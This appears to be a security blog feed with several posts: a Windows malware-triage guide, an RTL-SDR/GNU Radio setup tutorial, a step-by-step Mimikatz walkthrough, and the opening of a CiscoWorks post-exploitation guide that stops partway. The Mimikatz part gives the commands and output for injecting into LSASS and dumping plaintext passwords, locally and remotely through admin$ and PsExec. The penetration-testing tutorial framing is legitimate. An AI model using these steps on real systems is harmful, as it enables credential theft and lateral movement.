The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and the keyname for the service.
tasklist /svc >> output.txt


Sample Output
C:\>tasklist /svc

Image Name PID Services
========================= ====== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 604 N/A
csrss.exe 652 N/A
winlogon.exe 676 N/A
services.exe 720 Eventlog, PlugPlay
lsass.exe 732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe 892 DcomLaunch, TermService
svchost.exe 960 RpcSs
svchost.exe 1072 Browser, CryptSvc, Dhcp, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, seclogon, SENS, SharedAccess,
ShellHWDetection, TapiSrv, TrkWks, W32Time,
winmgmt, wscsvc, wuauserv
svchost.exe 1132 Dnscache
svchost.exe 1272 LmHosts, RemoteRegistry
explorer.exe 1408 N/A
VMwareUser.exe 1648 N/A
ctfmon.exe 1660 N/A
wracing.exe 1680 N/A
sqlmangr.exe 1692 N/A
svchost.exe 1808 WebClient
inetinfo.exe 1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe 1880 MSSQLSERVER
VMwareService.exe 128 VMTools
alg.exe 1168 ALG
cmd.exe 1928 N/A
firefox.exe 380 N/A
notepad.exe 1344 N/A
tasklist.exe 1820 N/A
wmiprvse.exe 1892 N/A

The non-native tool, psservice.exe, is another tool from Mark Russinovich (of sysinternals--now Microsoft) and can be found at http://technet.microsoft.com/en-us/sysinternals/bb897542. This can be used to function as the “sc” command--however, the advantage of this tool compared to sc is that it can be run remotely using credentials other than the current user. Additionally, it easily provides the binary path and description with one query shown below:
psservice config [service name] >> output.txt

Sample Output
C:\>psservice config webclient

PsService v2.24 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: WebClient
DISPLAY_NAME: WebClient
Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these fun
ctions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP : NetworkProvider
TAG : 0
DEPENDENCIES : MRxDAV
SERVICE_START_NAME: NT AUTHORITY\LocalService

If you would like to get all of the services, descriptions, and full paths to the binaries, omit the service name at the end. For example:
psservice config

Examine Registry Entries and the Startup Directory


In the prior article we used two native Windows binaries to investigate this data, the reg command and dir command. In this article everything can be achieved with one tool--autorunsc. This is another tool from Mark Russinovich (of sysinternals--now Microsoft). It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -l >> output.txt

Sample Output
C:\>autorunsc -l

Sysinternals Autoruns v10.06 - Autostart program viewer
Copyright (C) 2002-2010 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

-snip-

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
putbginfo.bat.lnk
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\putbginfo.bat.lnk
File not found: C:\TOOLS\bginfo\putbginfo.bat


HKCU\Software\Microsoft\Windows\CurrentVersion\Run
ctfmon.exe
C:\WINDOWS\system32\ctfmon.exe
CTF Loader
Microsoft Corporation
5.1.2600.5512
c:\windows\system32\ctfmon.exe
5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
99cb7370f16773c8e2d0c86fe805ec638ab126e9 (SHA-1)
5fb24fc7916a6e6b3be7d84cb1684215b266cd1495575c2e5672b8447932e5b1 (SHA-256)
wracing
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
c:\documents and settings\administrator\local settings\temp\wracing.exe
862cac1ffae3ca515f1c8588e3c3c394 (MD5)
fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.

Malware will often modify the system security settings contained within the Registry to make removal and remediation more difficult such as disabling the firewall or antivirus and other critical system security alerting mechanisms.

The Windows Security Center settings are common targets for malware infections. They are set to allow you to be notified if something happens to your antivirus, firewall, windows updates, etc. Set with a value of “0” the “disable” is turned off – thus the feature is still active and you will be warned if your antivirus or firewall is disabled, etc. If set with a “1” then the “disable” is turned on, and the affected item will no longer report in the Windows Security Center as an item of concern if disabled.

To review the Registry run:
regedit

Common items which are disabled by malware include entries similar to those found below:

HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
FirstRunDisabled REG_DWORD 0x1
AntiVirusDisableNotify REG_DWORD 0x0
FirewallDisableNotify REG_DWORD 0x0
UpdatesDisableNotify REG_DWORD 0x0
AntiVirusOverride REG_DWORD 0x0
FirewallOverride REG_DWORD 0x0

If these registries are loaded with a “1” then the item is disabled.

Examine Scheduled Tasks


In the prior article we used two native Windows binaries to investigate this data, the at command and schtasks command. In this article everything can be achieved with one tool--autorunsc. This is the same tool used above to check the registry entries and startup directory. It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -t >> output.txt

Sample Output
C:\Documents and Settings\Administrator>autorunsc -t

Sysinternals Autoruns v11.21 - Autostart program viewer
Copyright (C) 2002-2012 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

Task Scheduler
ezyme.job
C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
C:\Windows\temp\ezmye.zbz
aa186d30801500ca22b83c17d42ea743 (MD5)
304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
-snip-

This output is far superior to that of at or schtasks because it provides the full bath to the binary, arguments, as well as MD5 and SHA-1 hashes! Wow.

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
wracing 1680 8 1 19 324 0:00:41.609 4:05:23.687

and here:
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
"C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

It also has a connection out to a known bad site:

Process Name      : wracing.exe
Process ID : 1680
Remote Port : 443
Remote Port Name : https
Remote Address : 63.232.79.43
Process Path : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe

Malicious files are present in the following directory:

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll

The persistence mechanism is via the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
wracing
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
c:\documents and settings\administrator\local settings\temp\wracing.exe
862cac1ffae3ca515f1c8588e3c3c394 (MD5)
fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

Task Scheduler
ezyme.job
C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
C:\Windows\temp\ezmye.zbz
aa186d30801500ca22b83c17d42ea743 (MD5)
304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
-snip-16:33:00, 3/23/2012

Recovery


Fortunately antivirus programs protect us from most of the threats that are out there, however the bad guys are constantly finding new ways to infect our systems with new malware. Once your system is infected, the only way to be 1000% certain you have found all of the components of the malware is to re-image your system. (Don’t just re-format the hard disk, as some malware such as TDSS is now infecting the disk boot records)

If you decide to go the route of manual cleanup, here are some helpful thoughts to speed you on your journey:

  • If you find your system is infected by the malware, first thing you want to do is to disconnect your system from the internet as quickly as possible to prevent additional malware from being placed on your system and to limit the potential data loss.
  • Make a backup. Note that some malware will also infect any USB device which is plugged in. This means that inserting a USB hard drive to perform a backup may actually infect it with an active infection component.
  • Turn off the system restore. If the malware infected any of the critical operating system areas, the system restore points may contain copies of the infection which you can inadvertently restore to operation if you recover your OS from an infected copy
    • My Computer-> Properties->click the System Restore tab-> Click to select the Turn off System Restore check box
  • Using a known clean system, change all your passwords. A common target for malware are credentials, which can then be used by the bad guys to access your accounts, perform fraudulent activities, etc.
  • Install and Scan your system with latest updated antivirus and anti-spyware software to clean the malware or spyware, be sure to configure the software to prompt you prior to taking action on any suspicious files found.
  • Reboot your system and update all the antivirus signatures and again rescan your system your system with antivirus and spyware.
  • If your system is still affected by the malware, then a running process may be infected. To solve this issue you need to live boot to a software CD such as BART PE (http://www.nu2.nu/pebuilder/ ) to prevent the process from running. Tools such as HIJACK THIS can be used to clean the system while the process is not running in order to remove the infection.


Food for Thought


If the infection is using rootkit technology, there is a better chance that either the native or non-native Windows tools will reveal that something is amiss--especially if the non-native tool uses non-Windows API calls to gather the information. If nothing shows up as indicators of compromise, but relatives are still convinced they are owned--they may have a healthy dose of paranoia. Either way, they may have to take it in to a shop or wait until the next holiday gathering when you have your fingers on the keyboard for a more in-depth analysis. As always, happy hunting!

Getting Started with GNU Radio and RTL-SDR (on Backtrack)

$
0
0
By Brad Antoniewicz.

In this blog post I'll aim to get you at least partially familiar with Software Defined Radio, the Realtek RTL2832U chipset, and provide Backtrack 5 R2 setup and usage instructions so that you can easily get off to a good start.

Software Defined Radio


In the last few years, Software Defined Radio (SDR) has been drawing a lot of attention from radio enthusiasts and hackers alike. This is because SDRs move much of the signal processing from hardware into software. This provides incredible flexibility. For instance, normally, with your standard 2.4GHz 802.11 adapter, your use cases are relatively limited: transmitting and monitoring 802.11 traffic on the 2.4GHz spectrum. However with an SDR, since the processing is not locked into the firmware of the adapter, you have greater capabilities: you're only limited by the frequency spectrum the card supports (within 2.4GHz) and not the protocol. So you could then transmit and monitor anything that exists within the 2.4GHz spectrum such as cordless phones, bluetooth devices, microwave ovens, car alarms, video devices, ZigBee (the list goes on and on), and of course, 802.11.

GNU Radio



GNU Radio is the development toolkit that handles the signal processing from the SDR hardware (or a from a file containing signaling information). This is essentially the work horse of SDR. Unfortunately, GNU Radio has a bad reputation for being not so well documented and a bit bloated. That's ok though, whether you agree or not, you cannot deny that it's maintainers are doing really amazing work. In my opinion, if you don't like the documentation, then its up to you to write good guides so that people can utilize this great work.

Hardware


Obviously a big component of SDR is the hardware. Although there are a number of different platforms out there, we'll discuss the USRP and ones utilizing the RTL2832U chipset (since its the topic of this blog post).

USRP



The Universal Software Radio Peripheral (USRP) by Ettus Research (who must be raking in the dough, based on their new website) is, and pretty much has been, the defacto hardware component of SDR for the last 5 years (probably more). The USRP is modular and can support just about any radio frequency spectrum.

The USRP's main problem is that its really expensive. The main component ranges from $650 - $1700, and then you need daughter boards for the specific frequency spectrum you want to play with, which are $74-$450 each. Then there are antennas, cables, and other accessories. Sure, you could always use the open source schematics to build your own, but seriously, who the heck is going to do that. In a community that is known for being creative with costs, the USRP really builds a wall between the classes. Sucks..

Realtek RTL2832U



It was recently discovered that a number of manufacturers have released digital TV USB capture devices that leverage the Realtek RTL2832U Chipset. The chipset was created with the intention of doing DVB-T (digital TV) and COFDM (radio) demodulation for these adapters, however a curious radio enthusiast named Antti Palosaari, discovered that:

These $20 adapters are actually SDRs!

As you can imagine, this discovery sparked a whole lot of interest. Soon the Osmocom OsmoSDR team built the necessary software to interact with the chipset and called it RTL-SDR. Additionally, RTL-SDR fans started documenting all of their experiences on the /r/RTLSDR/ subreddit page. People began doing everything they could with their brand new, super cheap, RTL-SDRs


Supported Frequencies

One of the major downsides to the RTL2832U is that it supports only 64 – 1700 MHz (at most). This means we're somewhat confined to the technologies we can play with. That being said, it's really nothing to complain about because there are a ton of things within that frequency spectrum (and for $20, complaining is not allowed)!


Supported Adapters

It's pretty crucial that when choosing what DVB-T dongles you buy, you first consult the various compatibility lists out there to ensure the adapter you're looking at, actually has a RTL2832U chipset and works well. Here are a couple to consult:

Where to buy
The one shown in the picture is mine, which was actually gifted to me (Thanks Steve!), bought at Deal Extreme (a.k.a. the shadiest site I buy from on the internet). Its the "DVB-T TV Receiver Realtek RTL2832U Elonics E4000 Radio P335", and can also be found on eBay for $18.88 (free shipping).

There's a list of adapters and where to buy them at:

Configuration


The Windows RTL-SDR setup and configuration is pretty well documented in a variety of places online. I like to use Linux for most of my tinkering, so this guide will focus specifically on setting things up and using Backtrack 5 R2. If you're using MacOSX, you're kind of screwed - RTL-SDR requires GNU Radio >= v3.5.3, and macports doesn't have it pre-built for you, compiling from source is super painful and requires a lot of manual code edits to get things working. Stick with a BT5R2 or Windows Virtual Machine until someone actually gets a macports package out.

Making sure your adapter is registered


Before doing anything, make sure you have the adapter plugged in and its detected by the system.
 root@bt:~# lsusb | grep -i RTL  
Bus 001 Device 008: ID 0bda:2832 Realtek Semiconductor Corp. RTL2832U DVB-T


Manual Labor


The people over at hack4fun wrote up an article about how to build everything from scratch. If you'd like to, that's a good guide to get you up and running to a certain point, but the truth is, you don't need to do that much work. There are a couple of scripts and other things that will accomplish the exact same thing (build form source) with much less typing.

The build-gnuradio script


Marcus Leech wrote a really simple to use script called build-gnuradio. This works great, but needs a handful of modifications in order to work on Backtrack. The main changes are to remove the sudo checks since Backtrack runs as root. I also added a patch for gr-smartnet to work a little better. An obviously more secure alternative would be to create a non-root user and run the script, but since I always use Backtrack in a non-persistent mode, that isn't a major concern of mine.

My modified version of the build-gnuradio script (called build-gnuradio-bt) can be downloaded here: Note: At the time of this writing the author of gr-smartnet just started to resume work on the project. There's a possibility that by the time you read this, he'll have figured out a way around the above gnuradio patch.

The way the script works is that it checks for a packages directory (included in the bundle described in the "The really easy way" section below), and if it doesn't find it, it defaults to the standard build-gnuradio script functionality and downloads all the required sources, compiles them, and installs. During the gnuradio build it will look for a "patches/gnuradio_gri_wav-v0.1.patch" file that patches gnuradio to work with gr-smartnet. If it can't find the patch, it'll just continue on and compile. To run the script, make sure you have internet access and type:
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
root@bt:~# mkdir patches
root@bt:~# cd patches
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch
root@bt:~# cd ..
root@bt:~# chmod +x build_gnuradio_bt
root@bt:~# ./build_gnuradio_bt


It will take some time to run so be patient. If you're using non-persistent backtrack or don't want to wait a long time for everything to compile, check out the next section, its much faster.

The really easy way


Since I use non-persistent Backtrack a lot and often don't have internet access when I do so, I built everything from scratch then created packages for all of the components.

The downside of this way is that you'll have to download a 290mb file that contains all the packages, but once that's done, its smooth sailing from there.

You can download the bundle (gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2) here: Integrity Checks:
md5sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
a603351e08318a963ee850c69acfcbb8 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

sha1sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
66eeb8eaace16f2af73b7d77be3c035fa2359f81 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2


I just copy the bundle to the root of my BT5R2 USB stick, then once its booted, just:

root@bt:~# tar -jxf /cdrom/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2 
root@bt:~# cd gnuradio_rtl-sdr_bt5r2_bundle_v0.1/
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# ./build-gnuradio-bt


The script will ask you to proceed and you should see output similiar to this:
[+] Offline install -> Installing gnuradio + supporting libraries
[+] Removing potentially conflicting packages
[+] Installing precompiled binaries from /root/gnuradio_rtl-sdr_bt5r2_bundle_v0.1/packages
[+] Wrapping up install
[+] Copying util to ~/rtl_sdr-utils
[+] Offline installation Completed! Enjoy!


Then you can rm the directory to free up disk space
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# cd ..
root@bt:~# rm -rf gnuradio_rtl-sdr_bt5r2_bundle_v0.1/


Using RTL-SDR


Once you have it all installed, a simple test to make sure the adapter is getting recognized is to use the rtl_test utility to run a quick benchmark. Your output should be similar:

root@bt:~# rtl_test -t
Found 1 device(s):
0: Generic RTL2832U (e.g. hama nano)

Using device 0: Generic RTL2832U (e.g. hama nano)
Found Elonics E4000 tuner
Supported gain values (18): -1.0 1.5 4.0 6.5 9.0 11.5 14.0 16.5 19.0 21.5 24.0 29.0 34.0 42.0 43.0 45.0 47.0 49.0
Benchmarking E4000 PLL...
[E4K] PLL not locked for 51000000 Hz!
[E4K] PLL not locked for 2219000000 Hz!
[E4K] PLL not locked for 1109000000 Hz!
[E4K] PLL not locked for 1237000000 Hz!
E4K range: 52 to 2218 MHz
E4K L-band gap: 1109 to 1237 MHz
root@bt:~#


Multimode.py

Marcus Leech created a tool called Multimode that acts as a multi-mode receiver for a variety of modes such as FM, AM, SSB, WFM, and TV-FM. This is the perfect tool to start playing with SDR.

Installation

If you used the easy way above, then multimode is already installed, if not, you'll need to do it.
root@bt:~# svn co https://www.cgran.org/svn/projects/multimode
A multimode/trunk
A multimode/trunk/multimode_helper.py
A multimode/trunk/multimode.py
A multimode/trunk/COPYING
A multimode/trunk/multimode.grc
A multimode/trunk/Makefile
A multimode/trunk/README
Checked out revision 996.
root@bt:~# cd multimode/trunk/
root@bt:~/multimode/trunk# make install
mkdir -p /root/bin
cp multimode.py multimode_helper.py /root/bin
Please make sure your PYTHONPATH includes /root/bin
And also that PATH includes /root/bin
this will allow multimode to work correctly
root@bt:~/multimode/trunk# export PYTHONPATH=$PYTHONPATH:/root/bin
root@bt:~/multimode/trunk# export PATH=$PATH:/root/bin

Interface


If you launch mutlimode with no options:
root@bt:~/bin# ./multimode.py 

It will listen on 150FM. Make sure you have your speakers turned on and volume up. Remember mutlimode is decoding the over the air signals and playing them back for your enjoyment, no sound = no fun. Obviously if nothing is transmitting in your area on 150MHz then you'll need to change it.

The interface can become a little sluggish and sometimes unresponsive on slower machines, so be patient. It is broken up into three main parts:
  1. Controls (Top)
  2. Spectrograph (Middle)
  3. Panorama (Bottom)



The guys at hack4fun cut out the spectrograph in the version they use on their site, because the panorama was getting cut off by the bottom of the screen.

Listening to FM Radio!


The local [crappy] radio station here in NYC is Z100, or more specifically 100.3FM. To leverage multimode.py to access it, just launch it with the following attributes:
root@bt:~/bin# ./multimode.py --freq 100.3M --dmode=WFM

And you should be able to hear the radio station playing!

Need the weather forecast? Checkout 162.550:

root@bt:~/bin# ./multimode.py --freq 162.550M

Listening to Local Law Enforcement!


Law enforcement is another great thing to listen to. Since everything is so close together in NYC, you can pick up almost all precincts, so lets see whats going on with the 17th! It's non-trunked and operating at 476.58750 so lets key that into multimode:
root@bt:~/bin# ./multimode.py --freq 476.587M --ftune=5k

And if you keep an eye on the Spectrograph, you can see if there is activity on neighboring frequencies (precincts).



Other Notable Fun!


The GNURadio community is massive and there are a ton of people writing great code to leverage SDR's capabilities. Here's a short list of things that may appeal to our audience:

For more applications written for GNU Radio (specifically RTL-SDR) see:

Using the GNU Radio Companion


One of the most powerful components of GNU Radio is the GNU Radio Companion (GRC). It allows you to graphically program GNU Radio applications!

Creating a Spectrum Analyzer


Probably the simplest application to write using GRC is a spectrum analyzer. Since this is just meant as a quick introduction, we'll create a very stripped down spectrum analyzer to demonstrate some of the power of GRC.

Launching GRC

Launching GRC will require you to be running X, then just run:
root@bt:~# gnuradio-companion
A new window should open up, this is your development environment!

The GRC interface is split into three panes:
  1. The development area (Main Area/Left pane): This is where you'll create your flow graph
  2. Logging pane (Lower): Provides logging and debugging messages
  3. Block (Right pane): Lists the different development blocks that will make up your flow graph and application

Creating a Signal Flow Graph


Since GNU Radio can accept input from a variety of sources, the first thing we'll want to define is the actual source for our application. Since we've been using RTL-SDR, lets pick that.

Under "Sources" select "RTL2832 Source" from the Block pane and drag it into the development area.

Note: According to the comments below, it makes more sense to use the OsmoSDR source, since its the official and latest greatest!


Next, we'll need to define something to do with our source. Since we want to create a spectrum analyzer, the "FFT sink" block is just what we need as it will show us what the spectrum looks like. We'll use the one under "WX GUI" to leverage wxPython.

Under "WX GUI Widgets" select "WX GUI FFT Sink from the block pane and drag it into the development area.



We'll have to also connect our Source to the FFT Sink. Click once on "Out" on the Source block then click "In" on the FFT Sink block. This will take the output from our RTL2832 and send it to the FFT sink.



You'll notice that the title of the source block (RTL2832 Source) and an attribute within the block (Frequency) are both highlighted Red. This indicates a potential error: Frequency is a required attribute and it is undefined. Lets fix that

Double click the source block and set a frequency. Here we'll define that of our radio station (100.3) which in Hz translates to 100300000. The E Notation of that is 1003e5.



That's all there is to it! Now generate everything by going to "Build" -> "Generate" (or by pressing the generate button). You should be prompted to save first, so here I'll just save it to /root/simple_test.grc:



Then run it by going to "Build" -> "Execute" (or by pressing the execute button). A new window should open up showing the signal in real time:



Depending on the power of your system, the window may be a little unresponsive or sluggish. We don't really need a throttle (a block between the source and the FFT sink) but if we add one, it'll fix that a bit.

If you check the "Average" you can clean up the signal:



The "Peak" checkbox will draw a line on the peaks, which can be useful if the signal is rapidly changing and you're trying to get an idea of what frequencies are being transmitted on:



If you wanted to always have the "Average" and "Peak" checked, you can modify the FFT Sink in the original drawing and set the two to "On":



To share your flows with other people, just send them your .grc (/root/simple_test.grc). You'll notice another file was created in the same directory, /root/simple_test.py. This is the Python source file for your application. If you didn't want to run GRC, you can launch the application independently:

root@bt:~ # ./simple_test.py


Want to learn more? Just yesterday (seriously, GNURadio is freaking exploding because of RTL-SDR), balint256 just put together a group of GNU Radio tutorials that will take you to the next level! Check them out here!

Got tips for GNU Radio or RTL-SDR? See something I got wrong above? Speak up in the comments below!!



Using Mimikatz to Dump Passwords!

$
0
0
By Tony Lee.

If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)

Download

Mimikatz can be downloaded from:

A couple of things to take into consideration:
  1. The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
  2. You need to run it as admin (need debug privs)
  3. Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)

Use Cases


The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.

What the heck is WDigest?


WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.


Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Running mimikatz


To run mimikatz you'll need mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords


Running locally (Windows 2008 R2 – 64-bit)


To enter the interactive command mimikatz command prompt, just launch the executable:
mimikatz.exe


You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz #



Next, we'll need to enable debug mode with the privilege::debug command:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz #


Then we'll need to inject sekurlsa.dll into LSASS, but using the inject::process command:
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz #


Finally, we'll pull any available login passwords using the @getLogonPasswords macro:
mimikatz # @getLogonPasswords

Authentification Id : 0;126660
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : FS
msv1_0 : lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }
wdigest : 1qaz@WSX
tspkg : 1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication




You should see one entry for each user. Note the msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the later contains the WDigest entry, which is the plain text password of the user!

Running Remotely (Windows 2003 – 32-bit)


Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows net commands and psexec.

We'll need to map the target remotely in order to copy over sekurlsa.dll. First we'll establish a connection to the servers admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:
net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo


Then just copy over sekurlsa.dll:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  



Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz #


Now at our mimikatz prompt, we can just do the same as if we running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz



mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id : 0;184995
Package d'authentification : NTLM
Utilisateur principal : PowerAccnt
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
wdigest : j************************\ <- Service account with Admin Privileges and suuuper long password - Ouch


Authentification Id : 0;62703
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
wdigest : ******************** <- Admin account with suuuper long password - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication




Cleanup


To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll


Then just double check its not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found



Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.



Final Thoughts

Insanely awesome tool--huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse. This makes another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.

Got some tips of your own? Let us know in the comments below!!!


Hack Tips: CiscoWorks Exploitation

$
0
0
by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI), we still see this management product present in many environments--thus is it still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks


Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • causer (Ciscoworks anonymous access user)

      C:\ >net user

      User accounts for \\CiscoWorksDemoBox

      ----------------------------------------------------------
      casuser user user2
      user3
      The command completed successfully.

  4. Services
    • These Windows services are started:

      C:\ >net start

      --SNIP--
      CiscoWorks ANI database engine
      CiscoWorks Daemon Manager
      CiscoWorks RME NG database engine
      CiscoWorks Tomcat Servlet Engine
      CiscoWorks Web Server


Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them
